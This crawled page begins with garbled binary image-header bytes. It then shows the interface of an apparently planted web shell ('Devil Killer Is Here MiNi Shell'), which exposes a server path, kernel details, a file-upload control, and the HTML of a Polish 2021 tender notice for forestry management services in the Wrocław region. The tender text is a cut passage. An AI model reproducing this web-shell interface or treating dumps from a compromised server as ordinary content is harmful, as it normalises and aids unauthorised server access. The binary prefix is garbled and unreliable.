JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211117/0027244301-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługi zarządzania zasobami leśnymi na nieruchomościach wchodzących w skład mienia Zasobu Własności Rolnej Skarbu Państwa na terenie działania KOWR OT we Wrocławiu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Krajowy Ośrodek Wsparcia Rolnictwa</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Oddział Terenowy we Wrocławiu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 367849538</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Mińska 60</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">54-610</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne.wroclaw@kowr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.kowr.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - agencja wykonawcza</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarowanie nieruchomościami Skarbu Państwa </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługi zarządzania zasobami leśnymi na nieruchomościach wchodzących w skład mienia Zasobu Własności Rolnej Skarbu Państwa na terenie działania KOWR OT we Wrocławiu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d7729141-4778-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00272443</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00011827/17/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.13 Zarządzanie zasobami leśnymi</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://kowr.eb2b.com.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem platformy zakupowej pod adresem https://kowr.eb2b.com.pl/ . Szczegółowe informacje znajdują się w Rozdziale VIII SWZ</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Szczegółowe informacje znajdują się w Rozdziale XII SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z rozdziałem XXII SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z rozdziałem XXII SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WRO.WOP.260.43.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 255385,37 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na jedną część</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.12.) Maksymalna liczna części, jaka może zostać udzielona jednemu wykonawcy: <span class="normal">1</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.	Przedmiot 1<br/>Przedmiotem zamówienia są usługi zarządzania zasobami leśnymi wchodzącymi w skład Zasobu Własności Rolnej Skarbu Państwa na terenie działania KOWR OT we Wrocławiu, tj. na terenie powiatów: górowskiego, głogowskiego, polkowickiego, lubińskiego, legnickiego, miasta Legnica woj. dolnośląskie w zakresie nadzoru i prowadzenia spraw związanych z gospodarką leśną na gruntach będących lasami i usług związanych z drzewostanem na gruntach niebędących lasami, położonych w granicach nieruchomości wchodzących w skład Zasobu Własności Rolnej Skarbu Państwa w tym sporządzania pełnej dokumentacji dla spraw prowadzonych w zakresie gospodarki leśnej i gospodarki drewnem.<br/>4.	W ramach realizacji usługi Wykonawca zobowiązany jest:<br/>1)	w zakresie spraw związanych z gospodarką leśną do:<br/>a)	prowadzenia spraw i nadzoru nad sprawami związanymi z gospodarką leśną na gruntach będących lasami i spraw dotyczących wycinki, korekty, pielęgnacji drzew i krzewów na gruntach niebędących lasami, zgodnie z ustawą z dnia 16 kwietnia 2004 r. o ochronie przyrody (tekst jednolity: Dz. U. 2020 r. poz. 55) oraz ustawą z dnia 20 lipca 2017 r. – Prawo wodne (tekst jednolity: Dz. U. 2020 r. poz. 310) a także odpowiednimi przepisami wykonawczymi;<br/>b)	sporządzania pełnej dokumentacji dla spraw prowadzonych w zakresie gospodarki leśnej i gospodarki drewnem, w tym rejestrowania tych spraw i prowadzenia ich w systemie komputerowym działającym w siedzibie Sekcji Zamiejscowej we Wrocławiu, <br/>c)	udziału w kontrolach prowadzonych u kontrahentów Zamawiającego w sprawach dotyczących gospodarki leśnej i zadrzewień;<br/>d)	przeprowadzania zleconych przez Zamawiającego lustracji gruntów, o których mowa w pkt a);<br/>e)	współpracy z Wojewódzkim Konserwatorem Zabytków w sprawach związanych z pielęgnacją, korektą i wycinką drzew na terenach wpisanych do rejestru zabytków.<br/>2)	w zakresie wyceny pozyskanego drewna do: <br/>a)	wyceny i klasyfikacji dokonanej na podstawie oględzin drzew rosnących na nieruchomościach stanowiących Zasób Własności Rolnej Skarbu Państwa <br/>b)	szacunku brakarskiego i zakwalifikowania drewna jako użytkowe bądź opałowe dokonane na podstawie oględzin drzew według ustalonych wad drewna i jego przydatności;<br/>c)	pomiaru dokonywanego za pomocą średnicomierza, taśmy mierniczej – zalegalizowanej;<br/>d)	wyliczenia masy drewna dokonanego na podstawie „tablic miąższości kłód odziomkowych i drzew stojących” oraz „tablic miąższości drewna okrągłego” jak też na podstawie własnych wzorów empirycznych;<br/>e)	wyceny drewna korzystając z zatwierdzonego dokumentu cennik netto, ceny detaliczne drewno (zł/m3) oraz własnej kalkulacji polegającej na określeniu ceny drewna z uwzględnieniem wad istotnych wykrytych w drewnie oraz biorąc pod uwagę specyfikę warunków w jakich rosną drzewa i wpływ tych warunków na jakość, przydatność drewna.<br/>3)	w zakresie cechowania drewna do:<br/>a)	pozyskania drewna w oparciu m.in. o art. 14 a ust. 1 i 3 ustawy z dnia 28 września 1991 r. o lasach (Dz. U. z 2020 r. poz. 6) oraz rozporządzenie Ministra Ochrony Środowiska, Zasobów Naturalnych i Leśnictwa z dnia 24 lutego 1998 r. w sprawie szczegółowych zasad cechowania drewna, wzorów urządzeń do cechowania i zasad ich stosowania oraz wzoru dokumentu stwierdzającego legalność pozyskania drewna (Dz. U. Nr 36 poz. 201).<br/>b)	cechowania drewna według systemu płytkowego. Płytki nabijane będą na kłodzie ściętego drzewa za pomocą specjalnego młotka. Płytki będą wykorzystywane jednorazowo i każda z nich będzie miała odrębny numer. <br/>c)	sporządzania dokumentów dot. legalności pozyskania drewna.<br/>d)	sporządzania wykazu odbiorczego drewna.<br/>4)	w zakresie interwencji w sprawie kradzieży drewna do:<br/>a)	spisania notatki na miejscu zdarzenia w tym określenia wartości, zabezpieczenia i opisania skradzionego drewna - zrobienia dokumentacji fotograficznej;<br/>b)	zgłoszenia na policję zaistniałego zdarzenia oraz udziału w postępowaniu wyjaśniającym.<br/>5)	w zakresie nadzoru nad pracami wykonawczymi w terenie do przygotowania zleceń na prace związane z gospodarką leśną w terenie, sprawowania pełnego nadzoru nad tymi pracami oraz przyjęciu ich i rozliczeniu.<br/>6)	W zakresie sporządzania sprawozdań z wykonanych czynności - do sporządzania sprawozdań z czynności wykonywanych w ramach realizacji przedmiotu zamówienia, w szczególności rozliczeń finansowych, jakościowych i ilościowych dla spraw prowadzonych.<br/>5.	Warunki oraz terminy realizacji przedmiotu zamówienia: <br/>a) świadczenie usług wykonywanych w ramach niniejszego zamówienia będzie odbywało się: w terenie lub siedzibie Sekcji Zamiejscowej we Legnicy przy ul. Jaworzyńskiej 199, 59-220 Legnica. <br/>b) wykonawca zobowiązany będzie świadczyć usługi (w tym prace terenowe) w wymiarze <br/>110 godzin miesięcznie. Harmonogram obecności ustalony będzie z Zamawiającym. <br/>c)	przed wystawieniem faktury za wykonane usługi, wykonawca zobowiązany będzie do sporządzania wykazów z wykonanych usług w szczególności rozliczeń finansowych, jakościowych i ilościowych dla spraw prowadzonych wraz z rozliczeniem godzinowym.<br/>d)	zamawiający zapewni Wykonawcy nieodpłatną obsługę organizacyjno-techniczną w Sekcji Zamiejscowej w Legnicy, w tym: <br/>- wyposażone stanowisko pracy biurowej, z dostępem do podstawowych urządzeń technicznych, w tym komputera, kopiarki, telefonu, umożliwiające wykonywanie czynności w zakresie przewidzianym umową,<br/>- wysyłanie i odbiór korespondencji związanej z świadczoną usługą, <br/>- kompletowanie i udostępnianie niezbędnych dla danej sprawy dokumentów źródłowych.<br/>e)	pozostałe warunki realizacji zamówienia opisane zostały w istotnych postanowieniach umownych, stanowiących załącznik do SWZ.<br/><br/>W oparciu o art. 121 Ustawy prawo zamówień publicznych, Zamawiający zastrzega obowiązek osobistego wykonania przez Wykonawcę kluczowych części zamówienia. Kluczową częścią zamówienia dla Zamawiającego jest pełnienie dyżuru w siedzibie Zamawiającego. Zamawiający dopuszcza możliwość pełnienia dyżuru przez maksymalnie jedną osobę.<br/><br/>Zamawiający informuje, że średnio na miesiąc do wykonania przedmiotu zamówienia wykonawca będzie pokonywał trasę ok. 1500 km własnym środkiem transportu. <br/><br/>6.	Zatrudnienie pracowników na umowę o pracę:<br/>1)	Zamawiający na podstawie art. 95 ustawy PZP wymaga, a Wykonawca zobowiązuje się przy realizacji umowy, do zatrudniania na podstawie umowy o pracę w rozumieniu przepisów Ustawy z dnia 26 czerwca 1974 r. Kodeks pracy (t.j. Dz.U. 2020. 1320), we własnym przedsiębiorstwie lub przedsiębiorstwie podwykonawcy, osób wykonujących następujące czynności w zakresie realizacji zamówienia - usług wymienionych w ust 4 pkt. 1), 3), 4), 5), 6)<br/>2)	W celu dokumentowania zatrudnienia osób, o których mowa w art. art. 95 ustawy PZP Wykonawca przedłoży Zamawiającemu wykaz osób, które będą wykonywały czynności wymienione w ust 4 pkt. 1), 3), 4), 5), 6) z określeniem okresu ich zatrudniania oraz wymiaru czasu pracy (równoznaczne z ilością godzin świadczonych usług wskazanych w ofercie), ustalonych w umowie o pracę, zarówno z Wykonawcą jak i z podwykonawcą. Wykaz zostanie złożony najpóźniej w dniu przed podpisaniem umowy. Następnie na każde pisemne wezwanie Zamawiającego, Wykonawca będzie zobligowany przedstawić w terminie 2 dni roboczych, kopie dokumentów potwierdzających zatrudnienie osób na umowę o pracę przy realizacji zamówienia (w tym zanonimizowane – za wyjątkiem imienia i nazwiska – umożliwiające identyfikację umowy o pracę, dokumenty potwierdzające opłacanie składek na ubezpieczenie społeczne i zdrowotne, z tytułu zatrudnienia na umowę o pracę, np. zaświadczenie ZUS, dokumenty potwierdzające zgłoszenie pracownika do opłacania składek). <br/>3)	Zamawiający będzie miał prawo do sprawdzenia tożsamości pracownika, wykonującego czynności wskazane w ust 4 pkt. 1), 3), 4), 5), 6) i sprawdzenia zgodności z przedstawionym Zamawiającemu wykazem osób. Niespełnienie wymagań, o których mowa jak wyżej skutkować będzie naliczeniem kar umownych oraz będzie stanowiło podstawę rozwiązania umowy.<br/>4)	W przypadku wystąpienia zmian dot. zatrudnienia osób wykonujących czynności wskazane przez Zamawiającego do wykonania na podstawie umowy o pracę, Wykonawca ma obowiązek w terminie 7 dni od ich zaistnienia zgłosić na piśmie każdą zamianę Zamawiającemu. Wykonawca zobowiązany jest do przekazania Zamawiającemu nowego wykazu osób zatrudnionych przy realizacji zamówienia na podstawie umowy o pracę wraz ze wskazaniem czynności które będą oni wykonywać.<br/>5)	W przypadku osób prowadzących jednoosobową działalność gospodarczą lub wspólników spółek osobowych oraz kapitałowych niezatrudniających pracowników, Zamawiający zastrzega, że czynności w zakresie realizacji przedmiotu zamówienia określone w ust 4 pkt. 1), 3), 4), 5), 6) wykonają osobiście osoby prowadzące jednoosobową działalność gospodarczą, wspólnicy spółek kapitałowych. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 140461,79 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77231100-9 - Usługi zarządzania zasobami leśnymi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>1.Kryterium „Cena” – waga 60 %,<br/>2.Kryterium „Kwalifikacje zawodowe i doświadczenie osób wyznaczonych do bezpośredniej realizacji zamówienia” – waga 40 %,<br/>Sposób przyznania punktów opisano w z rozdziale XVIII SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kwalifikacje zawodowe i doświadczenie osób wyznaczonych do bezpośredniej realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 7.	Przedmiot 2<br/>Przedmiotem zamówienia są usługi zarządzania zasobami leśnymi wchodzącymi w skład Zasobu Własności Rolnej Skarbu Państwa na terenie działania KOWR OT we Wrocławiu, tj. na terenie powiatów: jaworskiego, ząbkowickiego wałbrzyskiego, miasta Wałbrzych, dzierżoniowskiego, świdnickiego kłodzkiego woj. dolnośląskie w zakresie nadzoru i prowadzenia spraw związanych z gospodarką leśną na gruntach będących lasami i usług związanych z drzewostanem na gruntach niebędących lasami, położonych w granicach nieruchomości wchodzących w skład Zasobu Własności Rolnej Skarbu Państwa w tym sporządzania pełnej dokumentacji dla spraw prowadzonych w zakresie gospodarki leśnej i gospodarki drewnem.<br/>8.	W ramach realizacji usługi Wykonawca zobowiązany jest:<br/>1)	w zakresie spraw związanych z gospodarką leśną do:<br/>a)	prowadzenia spraw i nadzoru nad sprawami związanymi z gospodarką leśną na gruntach będących lasami i spraw dotyczących wycinki, korekty, pielęgnacji drzew i krzewów na gruntach niebędących lasami, zgodnie z ustawą z dnia 16 kwietnia 2004 r. o ochronie przyrody (tekst jednolity: Dz. U. 2020 r. poz. 55) oraz ustawą z dnia 20 lipca 2017 r. – Prawo wodne (tekst jednolity: Dz. U. 2020 r. poz. 310) a także odpowiednimi przepisami wykonawczymi;<br/>b)	sporządzania pełnej dokumentacji dla spraw prowadzonych w zakresie gospodarki leśnej i gospodarki drewnem, w tym rejestrowania tych spraw i prowadzenia ich w systemie komputerowym działającym w siedzibie Sekcji Zamiejscowej we Wrocławiu, <br/>c)	udziału w kontrolach prowadzonych u kontrahentów Zamawiającego w sprawach dotyczących gospodarki leśnej i zadrzewień;<br/>d)	przeprowadzania zleconych przez Zamawiającego lustracji gruntów, o których mowa w pkt a);<br/>e)	współpracy z Wojewódzkim Konserwatorem Zabytków w sprawach związanych z pielęgnacją, korektą i wycinką drzew na terenach wpisanych do rejestru zabytków.<br/>2)	w zakresie wyceny pozyskanego drewna do: <br/>f)	wyceny i klasyfikacji dokonanej na podstawie oględzin drzew rosnących na nieruchomościach stanowiących Zasób Własności Rolnej Skarbu Państwa <br/>g)	szacunku brakarskiego i zakwalifikowania drewna jako użytkowe bądź opałowe dokonane na podstawie oględzin drzew według ustalonych wad drewna i jego przydatności;<br/>h)	pomiaru dokonywanego za pomocą średnicomierza, taśmy mierniczej – zalegalizowanej;<br/>i)	wyliczenia masy drewna dokonanego na podstawie „tablic miąższości kłód odziomkowych i drzew stojących” oraz „tablic miąższości drewna okrągłego” jak też na podstawie własnych wzorów empirycznych;<br/>j)	wyceny drewna korzystając z zatwierdzonego dokumentu cennik netto, ceny detaliczne drewno (zł/m3) oraz własnej kalkulacji polegającej na określeniu ceny drewna z uwzględnieniem wad istotnych wykrytych w drewnie oraz biorąc pod uwagę specyfikę warunków w jakich rosną drzewa i wpływ tych warunków na jakość, przydatność drewna.<br/>3)	w zakresie cechowania drewna do:<br/>e)	pozyskania drewna w oparciu m.in. o art. 14 a ust. 1 i 3 ustawy z dnia 28 września 1991 r. o lasach (Dz. U. z 2020 r. poz. 6) oraz rozporządzenie Ministra Ochrony Środowiska, Zasobów Naturalnych i Leśnictwa z dnia 24 lutego 1998 r. w sprawie szczegółowych zasad cechowania drewna, wzorów urządzeń do cechowania i zasad ich stosowania oraz wzoru dokumentu stwierdzającego legalność pozyskania drewna (Dz. U. Nr 36 poz. 201).<br/>f)	cechowania drewna według systemu płytkowego. Płytki nabijane będą na kłodzie ściętego drzewa za pomocą specjalnego młotka. Płytki będą wykorzystywane jednorazowo i każda z nich będzie miała odrębny numer. <br/>g)	sporządzania dokumentów dot. legalności pozyskania drewna.<br/>h)	sporządzania wykazu odbiorczego drewna.<br/>4)	w zakresie interwencji w sprawie kradzieży drewna do:<br/>c)	spisania notatki na miejscu zdarzenia w tym określenia wartości, zabezpieczenia i opisania skradzionego drewna - zrobienia dokumentacji fotograficznej;<br/>d)	zgłoszenia na policję zaistniałego zdarzenia oraz udziału w postępowaniu wyjaśniającym.<br/>5)	w zakresie nadzoru nad pracami wykonawczymi w terenie do przygotowania zleceń na prace związane z gospodarką leśną w terenie, sprawowania pełnego nadzoru nad tymi pracami oraz przyjęciu ich i rozliczeniu.<br/>6)	W zakresie sporządzania sprawozdań z wykonanych czynności - do sporządzania sprawozdań z czynności wykonywanych w ramach realizacji przedmiotu zamówienia, w szczególności rozliczeń finansowych, jakościowych i ilościowych dla spraw prowadzonych.<br/>9.	Warunki oraz terminy realizacji przedmiotu zamówienia: <br/>a) świadczenie usług wykonywanych w ramach niniejszego zamówienia będzie odbywało się: w terenie lub siedzibie Sekcji Zamiejscowej w Świdnicy przy ul. Kliczkowskiej 28, 58-100 Świdnica. <br/>b) wykonawca zobowiązany będzie świadczyć usługi (w tym prace terenowe) w wymiarze <br/>90 godzin miesięcznie. Harmonogram obecności ustalony będzie z Zamawiającym. <br/>c)	przed wystawieniem faktury za wykonane usługi, wykonawca zobowiązany będzie do sporządzania wykazów z wykonanych usług w szczególności rozliczeń finansowych, jakościowych i ilościowych dla spraw prowadzonych wraz z rozliczeniem godzinowym.<br/>d)	zamawiający zapewni Wykonawcy nieodpłatną obsługę organizacyjno-techniczną w Sekcji Zamiejscowej w Świdnicy, w tym: <br/>- 